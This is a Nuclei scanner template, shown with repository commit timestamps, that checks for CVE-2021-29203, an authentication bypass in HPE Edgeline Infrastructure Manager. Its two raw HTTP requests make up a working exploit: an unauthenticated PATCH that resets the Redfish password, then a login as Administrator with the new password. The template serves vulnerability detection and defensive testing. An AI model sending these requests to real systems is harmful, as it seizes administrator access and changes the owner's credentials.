nuclei-templates/cves/2021/CVE-2021-29203.yaml

56 lines
1.7 KiB
YAML
Raw Normal View History

2021-06-26 08:10:30 +00:00
id: CVE-2021-29203
2021-06-26 08:10:30 +00:00
info:
name: HPE Edgeline Infrastructure Manager v1.21 Authentication Bypass
author: madrobot
severity: critical
description: A security vulnerability has been identified in the HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22. The vulnerability could
be remotely exploited to bypass remote authentication leading to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration. HPE has released a software
update to resolve the vulnerability in the HPE Edgeline Infrastructure Manager.
reference:
- https://www.tenable.com/security/research/tra-2021-15
- https://nvd.nist.gov/vuln/detail/CVE-2021-29203
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-29203
cwe-id: CWE-287
tags: hpe,cve,cve2021,bypass
2021-06-26 08:10:30 +00:00
requests:
- raw:
- |
PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/json
2021-06-30 15:57:06 +00:00
{"Password":"{{randstr}}"}
2021-06-26 08:10:30 +00:00
- |
POST /redfish/v1/SessionService/Sessions/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
2021-06-30 15:57:06 +00:00
{"UserName":"Administrator","Password":"{{randstr}}"}
2021-06-26 08:10:30 +00:00
matchers-condition: and
matchers:
2021-06-30 15:57:06 +00:00
2021-06-26 08:10:30 +00:00
- type: status
status:
- 201
2021-06-30 15:57:06 +00:00
2021-06-26 08:10:30 +00:00
- type: word
2021-06-30 15:57:06 +00:00
condition: and
part: header
2021-06-26 08:10:30 +00:00
words:
- "X-Auth-Token"
- "PasswordReset"
- "Location"
2021-06-30 15:57:06 +00:00
2021-06-26 08:10:30 +00:00
- type: word
part: body
2021-06-30 15:57:06 +00:00
words:
- "Base.1.0.Created"